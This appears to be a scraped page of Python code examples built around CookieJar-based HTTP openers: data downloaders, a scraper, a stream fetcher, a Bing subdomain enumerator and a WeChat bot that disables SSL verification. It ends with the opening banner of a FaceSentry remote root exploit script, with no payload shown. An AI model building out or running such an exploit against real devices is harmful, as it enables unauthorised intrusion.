        logger.info("Fetched %s in %0.3fsec + %0.3fsec browser overhead",
                    url, request_time,
                    open_ended - open_started - request_time)
        after_browser_activity.send(self)
Example #36
0
    def __init__(self, url, **kwargs):
        """
        Request init
        """
        self.request = None
        self.response = None
        self.code = -1
        self.header = {}
        self.cookieJar = None
        self.reason = ''
        self.content = ''
        self.content_dict = {}

        # 是否将服务端返回结果从 json 转为 dict
        self.is_decode_response = kwargs.get('is_decode_response', False)

        data = kwargs.get('data', None)
        # 当请求是 GET 请求,同时传了 data 字典的话,post_type 默认是 form,会进行 urlencode,并拼接到请求 URL 上
        post_type = kwargs.get('post_type', 'form')
        if data is not None:
            if isinstance(data, dict):
                if post_type == 'json':
                    data_str = json.dumps(data)
                else:
                    # data = {"name":"meetbill", "age":"21"}  ==> urlencode(data) = 'age=21&name=meetbill'
                    data_str = urlencode(data)

            if not isinstance(data_str, basestring):
                raise ValueError('data must be string or dict')
        else:
            data_str = None

        request_type = kwargs.get('type', 'POST')
        if data_str and isinstance(
                request_type, basestring) and request_type.upper() != 'POST':
            # 如果是 GET 请求,则将 data 中的内容转为 url 的一部分
            url = '{}?{}'.format(url, data_str)
            data_str = None  # GET data must be None

        self.request = urlRequest(url, data_str)
        # Content-type, 默认是 'application/x-www-form-urlencoded'
        if request_type.upper() == 'POST' and post_type == "json":
            self.request.add_header('Content-type', 'application/json')

        # referer
        referer = kwargs.get('referer', None)
        if referer:
            self.request.add_header('referer', referer)

        # user-agent
        user_agent = kwargs.get('user_agent', None)
        if user_agent:
            self.request.add_header('User-Agent', user_agent)

        # auth
        auth = kwargs.get('auth', None)
        if auth and isinstance(auth, dict) and 'usr' in auth:
            auth_string = base64.b64encode('{}:{}'.format(
                auth.get('usr', ''), auth.get('pwd', '')))
            self.request.add_header('Authorization',
                                    'Basic {}'.format(auth_string))

        # cookie
        cookie = kwargs.get('cookie', None)
        cj = None
        if cookie:
            if isinstance(cookie, CookieJar):
                cj = cookie
            elif isinstance(cookie, dict):
                result = []
                for k, v in cookie.items():
                    result.append('{}={}'.format(k, v))
                cookie = '; '.join(result)
            elif isinstance(cookie, Cookie.BaseCookie):
                cookie = cookie.output(header='')
            if isinstance(cookie, basestring):
                self.request.add_header('Cookie', cookie)

        if cj is None:
            cj = CookieJar()

        #! TODO: proxy

        # build opener
        debuglevel = 1 if kwargs.get('debug', False) else 0
        opener = build_opener(HTTPHandler(debuglevel=debuglevel),
                              HTTPSHandler(debuglevel=debuglevel),
                              HTTPCookieProcessor(cj))

        # timeout
        timeout = kwargs.get('timeout')
        if not isinstance(timeout, int):
            timeout = _DEFAULT_TIMEOUT

        t_beginning = time.time()
        try:
            # opener.open accept a URL or a Request object
            # 程序中判断是字符串时按照 URL 来处理, 否则按照是已经封装好的 Request 处理
            self.response = opener.open(self.request, timeout=timeout)
            self.code = self.response.getcode()
            self.header = self.response.info().dict
            self.cookieJar = cj
            self.content = self.response.read()
            # 进行将 response 转为 dict
            if self.is_decode_response:
                self.content_dict = json.loads(self.content)

                # 检查 response 内容是否符合预期
                check_key = kwargs.get('check_key', None)
                check_value = kwargs.get('check_value', None)
                if check_key is not None and check_value is not None:
                    # 检查 check_value 类型
                    if isinstance(check_value, list):
                        if self.content_dict[check_key] not in check_value:
                            self.code = -1
                            self.reason = "[response not match: {response_value} not in {check_value}]".format(
                                response_value=self.content_dict[check_key],
                                check_value=check_value)
                    elif self.content_dict[check_key] != check_value:
                        self.code = -1
                        self.reason = "[response not match: {response_value} != {check_value}]".format(
                            response_value=self.content_dict[check_key],
                            check_value=check_value)
        except HTTPError as e:
            self.code = e.code
            self.reason = '{}'.format(e)
        except URLError as e:
            self.code = -1
            self.reason = e.reason
        except Exception as e:
            self.code = -1
            self.reason = '{}'.format(e)

        seconds_passed = time.time() - t_beginning
        cost_str = "%.6f" % seconds_passed

        # 打印日志
        f = inspect.currentframe().f_back
        file_name, lineno, func_name = self._get_backframe_info(f)

        log_msg = ("[file={file_name}:{func_name}:{lineno} "
                   "type=http_{method} "
                   "req_path={req_path} "
                   "req_data={req_data} "
                   "cost={cost} "
                   "is_success={is_success} "
                   "err_no={err_no} "
                   "err_msg={err_msg} "
                   "res_len={res_len} "
                   "res_data={res_data} "
                   "res_attr={res_attr}]".format(file_name=file_name,
                                                 func_name=func_name,
                                                 lineno=lineno,
                                                 method=request_type,
                                                 req_path=url,
                                                 req_data=data,
                                                 cost=cost_str,
                                                 is_success=self.success(),
                                                 err_no=self.code,
                                                 err_msg=self.reason,
                                                 res_len=len(self.content),
                                                 res_data=self.content,
                                                 res_attr=json.dumps(
                                                     self.header)))

        if self.success():
            log.info(log_msg)
        else:
            log.error(log_msg)
Example #37
0
    def __init__(self):
        """ Initialisation de AdeConnectionUtil
		Cette méthode permet de construire le connecteur de site et le
		gestionnaire de cookie."""
        self.CJ = CookieJar()
        self.connection = build_opener(HTTPCookieProcessor(self.CJ))
def DownloadRoutine(tile, year, momonth, outputfolder):
    """Downloads files"""
    username = '******'
    password = '******'
    scratch = tempfile.mkdtemp()
    f = date(int(year), int(momonth), 1)
    DOY = str(f.timetuple().tm_yday).rjust(3, '0')
    hdf_pattern = re.compile(
        'MOD13A3.A' + year + DOY + '.' + tile + '.006.*.hdf$', re.IGNORECASE)
    source = "http://e4ftl01.cr.usgs.gov/" + "MOLT/MOD13A3.006/" + year + "." + momonth + ".01/"
    webFile = os.path.join(scratch, "earthdata.html")

    matched_file = ''
    files = []
    match_array = []
    try:
        if ALFlib.getDownload(source, webFile):
            page = open(webFile).read()
            files = []
            for url in page.split('<a href="'):
                link = url.split('">', 1)[0]
                if link.endswith('hdf'):
                    files.append(link.split("/")[-1])
    except urllib2.HTTPError:
        arcpy.AddMessage("\n[ERROR] No data for that date\n")
        sys.exit()
    for f in files:
        if re.match(hdf_pattern, f):
            matched_file = f
            match_array.append(matched_file)
            break
    if matched_file == '':
        print("\n[ERROR] No data for that tile\n")

    print("Found: " + matched_file)

    username = '******'
    password = '******'
    for f in match_array:
        url = os.path.join(source, f)
        print(url)
        file_name = url.split('/')[-1]

        # The user credentials that will be used to authenticate access to the data
        # Create a password manager to deal with the 401 reponse that is returned from
        # Earthdata Login

        password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, "https://urs.earthdata.nasa.gov",
                                      username, password)

        # Create a cookie jar for storing cookies. This is used to store and return
        # the session cookie given to use by the data server (otherwise it will just
        # keep sending us back to Earthdata Login to authenticate).  Ideally, we
        # should use a file based cookie jar to preserve cookies between runs. This
        # will make it much more efficient.

        cookie_jar = CookieJar()

        # Install all the handlers.

        opener = urllib2.build_opener(
            urllib2.HTTPBasicAuthHandler(password_manager),
            # urllib2.HTTPHandler(debuglevel=1),    # Uncomment these two lines to see
            # urllib2.HTTPSHandler(debuglevel=1),   # details of the requests/responses
            urllib2.HTTPCookieProcessor(cookie_jar))
        urllib2.install_opener(opener)

        # Create and submit the request. There are a wide range of exceptions that
        # can be thrown here, including HTTPError and URLError. These should be
        # caught and handled.

        request = urllib2.Request(url)
        response = urllib2.urlopen(request)

        # Print out the result (not a good idea with binary data!)

        body = response.read()
        file_ = open(os.path.join(outputfolder, file_name), 'wb')
        file_.write(body)
        file_.close()

        logging.debug(datelog + " : Your file, ", file_name,
                      " has downloaded to ",
                      os.path.join(outputfolder, file_name))
Example #39
0
        print('send result:', data)
    #print('===send===data', data)


def main(server=False):
    global IS_SERVER
    global MemberList, MemberMap, MemberNickMap
    if server:
        IS_SERVER = True
    try:
        ssl._create_default_https_context = ssl._create_unverified_context
    except Exception, e:
        print('ssl模块加载问题', str(e))

    opener = wxb_urllib.build_opener(
        wxb_urllib.HTTPCookieProcessor(CookieJar()))
    opener.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36'
    )]
    wxb_urllib.install_opener(opener)

    if not getUUID():
        print('获取uuid失败')
        return

    print('正在获取二维码图片...')
    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
Example #40
0
 def module_run(self, domains):
     base_url = 'https://www.bing.com/search'
     for domain in domains:
         self.heading(domain, level=0)
         base_query = 'domain:' + domain
         pattern = '"b_algo"><h2><a href="(?:\w*://)*(\S+?)\.%s[^"]*"' % (
             domain)
         subs = []
         # control variables
         new = True
         page = 0
         nr = 50
         cookiejar = CookieJar()
         cookiejar.set_cookie(
             self.make_cookie('SRCHHPGUSR',
                              'NEWWND=0&NRSLT=%d&SRCHLANG=&AS=1' % (nr),
                              '.bing.com'))
         # execute search engine queries and scrape results storing subdomains in a list
         # loop until no new subdomains are found
         while new == True:
             content = None
             query = ''
             # build query based on results of previous results
             for sub in subs:
                 query += ' -domain:%s.%s' % (sub, domain)
             full_query = base_query + query
             url = '%s?first=%d&q=%s' % (base_url, (page * nr),
                                         urllib.quote_plus(full_query))
             # bing errors out at > 2059 characters not including the protocol
             if len(url) > 2066: url = url[:2066]
             self.verbose('URL: %s' % (url))
             # send query to search engine
             resp = self.request(url, cookiejar=cookiejar)
             if resp.status_code != 200:
                 self.alert(
                     'Bing has encountered an error. Please submit an issue for debugging.'
                 )
                 break
             content = resp.text
             sites = re.findall(pattern, content)
             # create a unique list
             sites = list(set(sites))
             new = False
             # add subdomain to list if not already exists
             for site in sites:
                 if site not in subs:
                     subs.append(site)
                     new = True
                     host = '%s.%s' % (site, domain)
                     self.output('%s' % (host))
                     self.add_hosts(host)
             if not new:
                 # exit if all subdomains have been found
                 if not '>Next</a>' in content:
                     break
                 else:
                     page += 1
                     self.verbose(
                         'No New Subdomains Found on the Current Page. Jumping to Result %d.'
                         % ((page * nr) + 1))
                     new = True
             # sleep script to avoid lock-out
             self.verbose('Sleeping to avoid lockout...')
             time.sleep(random.randint(5, 15))
Example #41
0
def esa_cryosat_sync(PRODUCT,
                     YEARS,
                     BASELINE=None,
                     DIRECTORY=None,
                     BBOX=None,
                     POLYGON=None,
                     LOG=False,
                     LIST=False,
                     MODE=None,
                     CLOBBER=False):

    #-- create log file with list of synchronized files (or print to terminal)
    if LOG:
        #-- check if log directory exists and recursively create if not
        os.makedirs(DIRECTORY, MODE) if not os.path.exists(DIRECTORY) else None
        #-- format: ESA_CS_SIR_SIN_L2_sync_2002-04-01.log
        today = time.strftime('%Y-%m-%d', time.localtime())
        LOGFILE = 'ESA_CS_{0}_sync_{1}.log'.format(PRODUCT, today)
        fid1 = open(os.path.join(DIRECTORY, LOGFILE), 'w')
        print('ESA CryoSat-2 Sync Log ({0})'.format(today), file=fid1)
        print('PRODUCT={0}'.format(PRODUCT), file=fid1)
    else:
        #-- standard output (terminal output)
        fid1 = sys.stdout

    #-- CryoSat-2 Science Server url [sic Cry0Sat2_data]
    #-- static site is no longer available
    HOST = posixpath.join('https://science-pds.cryosat.esa.int')
    #-- compile xml parsers for lxml
    XMLparser = lxml.etree.XMLParser()
    #-- Create cookie jar for storing cookies
    cookie_jar = CookieJar()
    #-- create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(
        urllib2.HTTPSHandler(context=ssl.SSLContext()),
        urllib2.HTTPCookieProcessor(cookie_jar))
    #-- Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)
    #-- All calls to urllib2.urlopen will now use handler
    #-- Make sure not to include the protocol in with the URL, or
    #-- HTTPPasswordMgrWithDefaultRealm will be confused.

    #-- compile regular expression operator for years to sync
    regex_years = '|'.join('{0:d}'.format(y) for y in YEARS)
    R1 = re.compile('({0})'.format(regex_years), re.VERBOSE)
    #-- regular expression pattern for months of the year
    regex_months = '|'.join('{0:02d}'.format(m) for m in range(1, 13))
    R2 = re.compile('({0})'.format(regex_months), re.VERBOSE)

    #-- compile the regular expression operator to find CryoSat-2 files
    #-- spatially subset data using bounding box or polygon file
    if BBOX:
        #-- if using a bounding box to spatially subset data
        #-- only find header files to extract latitude and longitude coordinates
        R3 = compile_regex_pattern(PRODUCT, BASELINE, SUFFIX='(HDR)')
        #-- min_lon,min_lat,max_lon,max_lat
        lon = [BBOX[0], BBOX[2], BBOX[2], BBOX[0], BBOX[0]]
        lat = [BBOX[1], BBOX[1], BBOX[3], BBOX[3], BBOX[1]]
        #-- create shapely polygon
        poly_obj = shapely.geometry.Polygon(list(zip(lon, lat)))
        #-- Valid Polygon cannot have overlapping exterior or interior rings
        if (not poly_obj.is_valid):
            poly_obj = poly_obj.buffer(0)
    elif POLYGON:
        #-- if using a polygon file to spatially subset data
        #-- only find header files to extract latitude and longitude coordinates
        R3 = compile_regex_pattern(PRODUCT, BASELINE, SUFFIX='(HDR)')
        #-- read shapefile, kml/kmz file or GeoJSON file
        fileBasename, fileExtension = os.path.splitext(POLYGON)
        #-- extract file name and subsetter indices lists
        match_object = re.match('(.*?)(\[(.*?)\])?$', POLYGON)
        FILE = os.path.expanduser(match_object.group(1))
        #-- read specific variables of interest
        v = match_object.group(3).split(',') if match_object.group(2) else None
        #-- get MultiPolygon object from input spatial file
        if fileExtension in ('.shp', '.zip'):
            #-- if reading a shapefile or a zipped directory with a shapefile
            ZIP = (fileExtension == '.zip')
            m = read_shapefile(os.path.expanduser(FILE), VARIABLES=v, ZIP=ZIP)
        elif fileExtension in ('.kml', '.kmz'):
            #-- if reading a keyhole markup language (can be compressed)
            KMZ = (fileExtension == '.kmz')
            m = read_kml_file(os.path.expanduser(FILE), VARIABLES=v, KMZ=KMZ)
        elif fileExtension in ('.json', '.geojson'):
            #-- if reading a GeoJSON file
            m = read_geojson_file(os.path.expanduser(FILE), VARIABLES=v)
        else:
            raise IOError('Unlisted polygon type ({0})'.format(fileExtension))
        #-- calculate the convex hull of the MultiPolygon object for subsetting
        poly_obj = m.convex_hull
        #-- Valid Polygon cannot have overlapping exterior or interior rings
        if (not poly_obj.is_valid):
            poly_obj = poly_obj.buffer(0)
    else:
        R3 = compile_regex_pattern(PRODUCT, BASELINE)

    #-- open connection with Cryosat-2 science server at remote directory
    parameters = {'file': posixpath.join('Cry0Sat2_data', PRODUCT)}
    url = posixpath.join(HOST, '?do=list&{0}'.format(urlencode(parameters)))
    request = urllib2.Request(url=url)
    response = urllib2.urlopen(request, timeout=60)
    table = json.loads(response.read().decode())
    #-- find remote yearly directories for PRODUCT within YEARS
    YRS = [t['name'] for t in table['results'] if R1.match(t['name'])]
    for Y in YRS:
        #-- open connection with Cryosat-2 science server at remote directory
        parameters = {'file': posixpath.join('Cry0Sat2_data', PRODUCT, Y)}
        url = posixpath.join(HOST,
                             '?do=list&{0}'.format(urlencode(parameters)))
        request = urllib2.Request(url=url)
        response = urllib2.urlopen(request, timeout=360)
        table = json.loads(response.read().decode())
        #-- find remote monthly directories for PRODUCT within year
        MNS = [t['name'] for t in table['results'] if R2.match(t['name'])]
        for M in MNS:
            #-- local directory for data product of year and month
            local_dir = os.path.join(DIRECTORY, PRODUCT, Y, M)
            #-- check if local directory exists and recursively create if not
            os.makedirs(local_dir,
                        MODE) if not os.path.exists(local_dir) else None
            #-- open connection with Cryosat-2 science server at remote directory
            parameters = {
                'file': posixpath.join('Cry0Sat2_data', PRODUCT, Y, M)
            }
            url = posixpath.join(HOST,
                                 '?do=list&{0}'.format(urlencode(parameters)))
            request = urllib2.Request(url=url)
            response = urllib2.urlopen(request, timeout=360)
            table = json.loads(response.read().decode())
            #-- find remote files for PRODUCT within year and month
            colnames = [t['name'] for t in table['results']]
            collastmod = [t['mtime'] for t in table['results']]
            #-- if spatially subsetting
            if BBOX or POLYGON:
                #-- find names of valid header files
                header_files = [
                    f for i, f in enumerate(colnames) if R3.match(f)
                ]
                for f in sorted(header_files):
                    #-- remote and local versions of the file
                    parameters = {
                        'file': posixpath.join('Cry0Sat2_data', PRODUCT, Y, M,
                                               f)
                    }
                    remote_file = posixpath.join(
                        HOST, '?do=download&{0}'.format(urlencode(parameters)))
                    #-- extract information from filename
                    MI, CLASS, PRD, START, STOP, BSLN, VERS, SFX = R3.findall(
                        f).pop()
                    #-- read XML header file and check if intersecting
                    if parse_xml_file(remote_file, poly_obj, XMLparser):
                        #-- compile regular expression operator for times
                        R4 = compile_regex_pattern(PRODUCT,
                                                   BASELINE,
                                                   START=START,
                                                   STOP=STOP)
                        subset = [
                            i for i, f in enumerate(colnames) if R4.match(f)
                        ]
                        for i in subset:
                            #-- remote and local versions of the file
                            parameters = {
                                'file':
                                posixpath.join('Cry0Sat2_data', PRODUCT, Y, M,
                                               colnames[i])
                            }
                            remote_file = posixpath.join(
                                HOST, '?do=download&{0}'.format(
                                    urlencode(parameters)))
                            local_file = os.path.join(local_dir, colnames[i])
                            #-- get last modified date in unix time
                            remote_mtime = collastmod[i]
                            http_pull_file(fid1, remote_file, remote_mtime,
                                           local_file, LIST, CLOBBER, MODE)
            else:
                #-- find lines of valid files
                valid_lines = [
                    i for i, f in enumerate(colnames) if R3.match(f)
                ]
                for i in valid_lines:
                    #-- remote and local versions of the file
                    parameters = {
                        'file':
                        posixpath.join('Cry0Sat2_data', PRODUCT, Y, M,
                                       colnames[i])
                    }
                    remote_file = posixpath.join(
                        HOST, '?do=download&{0}'.format(urlencode(parameters)))
                    local_file = os.path.join(local_dir, colnames[i])
                    #-- get last modified date in unix time
                    remote_mtime = collastmod[i]
                    #-- check that file is not in file system unless overwriting
                    http_pull_file(fid1, remote_file, remote_mtime, local_file,
                                   LIST, CLOBBER, MODE)

    #-- close log file and set permissions level to MODE
    if LOG:
        fid1.close()
        os.chmod(os.path.join(DIRECTORY, LOGFILE), MODE)
Example #42
0
 def init(self):
     self._client = urllib2.build_opener(
         urllib2.HTTPCookieProcessor(CookieJar()))
     self.url = self.resolve_file_url(self._resolver_class, self._url)
     if not self.url:
         raise HTTPLoader.Error('Url was not resolved to file link')
Example #43
0
 def new_opener(self):
     from cookielib import CookieJar
     from urllib2 import build_opener, HTTPCookieProcessor
     return build_opener(HTTPCookieProcessor(CookieJar()))
Example #44
0
class HLSFetcher(object):

	def __init__(self, url, **options):

		self.program = options.get('program',1)
		self.hls_headers = options.get('headers',{})
		self.path = options.get('path',None)
		self.bitrate = options.get('bitrate',200000)
		self.nbuffer = options.get('buffer',5)
		self.n_segments_keep = options.get('keep',self.nbuffer+1)
		url = urllib.unquote(url)
		self.puser = options.get('puser')
		self.ppass = options.get('ppass')
		self.purl = options.get('purl')

		us = url.split('|')
		if len(us) > 1:
			self.url = us[0]
			for hd in us[1:]:
				self.hls_headers.update(dict(urlparse.parse_qsl(hd.strip())))
		else:
			self.url = url

		self.agent = self.hls_headers.pop('User-Agent', getUserAgent())
		if not self.path:
			self.path = tempfile.mkdtemp()

		self._program_playlist = None
		self._file_playlist = None
		self._cookies = CookieJar()
		self._cached_files = {} 	# sequence n -> path
		self._run = True
		self._poolHelper = TwHTTP11PoolHelper(retryAutomatically=True)

		self._files = None 			# the iter of the playlist files download
		self._next_download = None 	# the delayed download defer, if any
		self._file_playlisted = None # the defer to wait until new files are added to playlist
		self._new_filed = None
		self._seg_task = None

	def _get_page(self, url):
		url = url.encode("utf-8")
		if 'HLS_RESET_COOKIES' in os.environ.keys():
			self._cookies.clear()

		timeout = 10
		return twAgentGetPage(url, agent=self.agent, cookieJar=self._cookies, headers=self.hls_headers, timeout=timeout, pool=self._poolHelper._pool, proxy_url=self.purl, p_user=self.puser, p_pass=self.ppass)

	def _download_page(self, url, path, file):
		def _decrypt(data):
			def num_to_iv(n):
				iv = struct.pack(">8xq", n)
				return b"\x00" * (16 - len(iv)) + iv

			if not self._file_playlist._iv:
				iv = num_to_iv(file['sequence'])
				aes = AES.new(self._file_playlist._key, AES.MODE_CBC, iv)
			else:
				aes = AES.new(self._file_playlist._key, AES.MODE_CBC, self._file_playlist._iv)
			return aes.decrypt(data)

		d = self._get_page(url)
		if self._file_playlist._key:
			d.addCallback(_decrypt)
		return d

	def _download_segment(self, f):
		url = make_url(self._file_playlist.url, f['file'])
		name = 'seg_' + next(tempfile._get_candidate_names())
		path = os.path.join(self.path, name)
		d = self._download_page(url, path, f)
		if self.n_segments_keep != 0:
			file = open(path, 'wb')
			d.addCallback(lambda x: file.write(x))
			d.addBoth(lambda _: file.close())
			d.addCallback(lambda _: path)
			d.addErrback(self._got_file_failed)
			d.addCallback(self._got_file, url, f)
		else:
			d.addCallback(lambda _: (None, path, f))
		return d

	def delete_cache(self, f):
		bgFileEraser = eBackgroundFileEraser.getInstance()
		keys = self._cached_files.keys()
		for i in ifilter(f, keys):
			filename = self._cached_files[i]
			bgFileEraser.erase(str(filename))
			del self._cached_files[i]

	def delete_all_cache(self):
		bgFileEraser = eBackgroundFileEraser.getInstance()
		for path in self._cached_files.itervalues():
			bgFileEraser.erase(str(path))
		self._cached_files.clear()

	def _got_file_failed(self, e):
		if self._new_filed:
			self._new_filed.errback(e)
			self._new_filed = None

	def _got_file(self, path, url, f):
		self._cached_files[f['sequence']] = path
		if self.n_segments_keep != -1:
			self.delete_cache(lambda x: x <= f['sequence'] - self.n_segments_keep)
		if self._new_filed:
			self._new_filed.callback((path, url, f))
			self._new_filed = None
		return (path, url, f)

	def _get_next_file(self):
		next = self._files.next()
		if next:
			return self._download_segment(next)
		elif not self._file_playlist.endlist():
			self._seg_task.stop()
			self._file_playlisted = defer.Deferred()
			self._file_playlisted.addCallback(lambda x: self._get_next_file())
			self._file_playlisted.addCallback(self._next_file_delay)
			self._file_playlisted.addCallback(self._seg_task.start)
			return self._file_playlisted

	def _handle_end(self, failure):
		failure.trap(StopIteration)
		print "End of media"

	def _next_file_delay(self, f):
		if f == None: return 0
		delay = f[2]["duration"]
		if self.nbuffer > 0:
			for i in range(0,self.nbuffer):
				if self._cached_files.has_key(f[2]['sequence'] - i):
					return delay
			delay = 0
		elif self._file_playlist.endlist():
			delay = 1
		return delay

	def _get_files_loop(self, res=None):
		if not self._seg_task:
			self._seg_task = task.LoopingCall(self._get_next_file)
		d = self._get_next_file()
		if d != None:
			self._seg_task.stop()
			d.addCallback(self._next_file_delay)
			d.addCallback(self._seg_task.start)
			d.addErrback(self._handle_end)

	def _playlist_updated(self, pl):
		if pl and pl.has_programs():
			# if we got a program playlist, save it and start a program
			self._program_playlist = pl
			(program_url, _) = pl.get_program_playlist(self.program, self.bitrate)
			return self._reload_playlist(M3U8(program_url, self._cookies, self.hls_headers))
		elif pl and pl.has_files():
			# we got sequence playlist, start reloading it regularly, and get files
			self._file_playlist = pl
			if not self._files:
				self._files = pl.iter_files()
			if not pl.endlist():
				reactor.callLater(pl.reload_delay(), self._reload_playlist, pl)
			if self._file_playlisted:
				self._file_playlisted.callback(pl)
				self._file_playlisted = None
		else:
			raise Exception('Playlist has no valid content.')
		return pl

	def _got_playlist_content(self, content, pl):
		if not pl.update(content) and self._run:
			# if the playlist cannot be loaded, start a reload timer
			d = deferLater(reactor, pl.reload_delay(), self._fetch_playlist, pl)
			d.addCallback(self._got_playlist_content, pl)
			return d
		return pl

	def _fetch_playlist(self, pl):
		d = self._get_page(pl.url)
		return d

	def _reload_playlist(self, pl):
		if self._run:
			d = self._fetch_playlist(pl)
			d.addCallback(self._got_playlist_content, pl)
			d.addCallback(self._playlist_updated)
			return d
		else:
			return None

	def get_file(self, sequence):
		d = defer.Deferred()
		keys = self._cached_files.keys()
		try:
			endlist = sequence == self._file_playlist._end_sequence
			sequence = ifilter(lambda x: x >= sequence, keys).next()
			filename = self._cached_files[sequence]
			d.callback((filename, endlist))
		except:
			d.addCallback(lambda x: self.get_file(sequence))
			self._new_filed = d
			keys.sort()
		return d

	def _start_get_files(self, x):
		self._new_filed = defer.Deferred()
		self._get_files_loop()
		return self._new_filed

	def start(self):
		if self._run:
			self._files = None
			d = self._reload_playlist(M3U8(self.url, self._cookies, self.hls_headers))
			d.addCallback(self._start_get_files)
			return d

	def stop(self):
		self._run = False
		self._poolHelper.close()
		if self._seg_task != None:
			self._seg_task.stop()
		if self._new_filed != None:
			self._new_filed.cancel()
		reactor.callLater(1, self.delete_all_cache)
Example #45
0
def scrapeContent(url, agency):

    config = {
        'cnn': {
            'attr_key': '_class',
            'attr_val': 'zn-body__paragraph',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'foxnews': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'nytimes': {
            'attr_key': '_class',
            'attr_val': 'story-body-text story-content',
            'cookie': True
        },
        'gma': {
            'attr_key': 'itemprop',
            'attr_val': 'articleBody',
            'cookie': False
        },
        'usatoday': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'latimes': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': 'itemprop',
                'attr_val': 'articleBody',
            }
        },
        'washtimes': {
            'attr_key': '_class',
            'attr_val': '',
            'cookie': False,
            'tag': 'p',
            'parent': {
                'attr_key': '_class',
                'attr_val': 'storyareawrapper',
            }
        },
        'usnews': {
            'attr_key': '_class',
            'attr_val': 'MsoNormal',
            'cookie': False,
            'tag': 'p',
            # 'parent': {
            #     'attr_key': '_class',
            #     'attr_val': 'block skin-editable',
            # }
        },
    }

    cj = CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

    # page = requests.get(url)
    # print page.content
    # exit()

    hdr = {
        'User-Agent':
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
        'Accept-Encoding': 'none',
        'Accept-Language': 'en-US,en;q=0.8',
        'Connection': 'keep-alive'
    }

    req = urllib2.Request(url, headers=hdr)

    #necessary for cookie setter websites like nyt
    if config[agency]['cookie']:
        soup = BeautifulSoup(opener.open(req), "lxml")
    else:
        soup = BeautifulSoup(urllib2.urlopen(req), "lxml")

    # for row in soup.find_all('section', attrs={"class": "zn-has-46-containers"}):
    #     print row.text

    #print soup
    # for item in soup.findAll("section", {}, True):
    #     if 'zn-has-46-containers' in item.attrs['class']:
    #         print item

    #mydivs = soup.findAll('section', {'class': lambda x: 'zn-has-46-containers' in x.split()})

    #print mydivs

    #print soup.find_all("section", class_="zn-has-46-containers")
    #print soup.find_all("section", class_="zn-has-46-containers", True)

    #print soup; exit()

    #print soup.find_all("div")
    #container = soup.find_all("div", class_="l-container")
    #container = soup.find_all(class_="zn-body__paragraph")
    #container = soup.find_all("div", class_="article-text")
    #container = soup.find_all(class_="story-body-text story-content")

    # print config[agency]["attr_key"]
    # name = "soup.find_all(" + "" + "='articleBody')"
    # container = eval(name)

    #print config[agency]

    #print soup; exit()

    html = ''
    title = soup.find_all('title')
    title = title[0].renderContents()
    #print title; exit()
    #title = html2text.html2text(str(title))

    if 'parent' in config[agency]:
        parent_attributes = {
            config[agency]['parent']['attr_key']:
            config[agency]['parent']['attr_val']
        }
        parent = soup.find_all(**parent_attributes)
    else:
        parent = soup.find_all('html')

    #print parent; exit()

    attributes = {config[agency]['attr_key']: config[agency]['attr_val']}

    if 'tag' in config[agency]:
        attributes['name'] = config[agency]['tag']

    #print parent; exit()

    #print len(parent); exit()

    for par in parent:
        #print par;exit()
        # container = par.find_all(**attributes)
        # html += str(container)
        elements = par.find_all("p", _class="MsoNormal")
        print attributes
        print elements
        exit()
        for e in elements:
            html += unicode(e.renderContents(), 'utf-8')

    h = html2text.HTML2Text()
    h.ignore_links = True
    article = h.handle(html)

    # article =  h.handle(html) \
    #     .replace('\n,\n', '').replace('\r,\r', '').replace('\n,', '').replace(',\n', '').replace('\\n', '') \
    #     .strip("[").strip("]")

    return title, article
Example #46
0
def main():
    if os.name == 'posix':
        os.system('clear')
    if os.name == 'nt':
        os.system('cls')

    vremetodeneska = datetime.datetime.now()
    kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')
    print 'Starting exploit at ' + kd

    print '''
──────────────────────────────────
──FaceSentry Access Control System
────────Remote Root Exploit
─────────Zero Science Lab
────────www.zeroscience.mk
───────────ZSL-2019-5525
─────────────▄▄▄▄▄▄▄▄▄
─────────────▌▐░▀░▀░▀▐
─────────────▌░▌░░░░░▐
─────────────▌░░░░░░░▐
─────────────▄▄▄▄▄▄▄▄▄
───────▄▀▀▀▀▀▌▄█▄░▄█▄▐▀▀▀▀▀▄
──────█▒▒▒▒▒▐░░░░▄░░░░▌▒▒▒▒▒█
─────▐▒▒▒▒▒▒▒▌░░░░░░░▐▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▒█░▀▀▀▀▀░█▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▒▒█▄▄▄▄▄█▒▒▒▒▒▒▒▒▌
─────▐▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▌
─────▐▒▒▒▒▒█▒▒▒▒▒▒▒▒▒▒▒█▒▒▒▒▒▌
─────▐▒▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▌▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▌▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▒▌
─────▐▒▒▒▒▒▒▌▄▄▄▄▄▄▄▄▄▐▒▒▒▒▒▒▌
─────▐▄▄▄▄▄▄▌▌███████▌▐▄▄▄▄▄▄▌
──────█▀▀▀▀█─▌███▌███▌─█▀▀▀▀█
──────▐░░░░▌─▌███▌███▌─▐░░░░▌
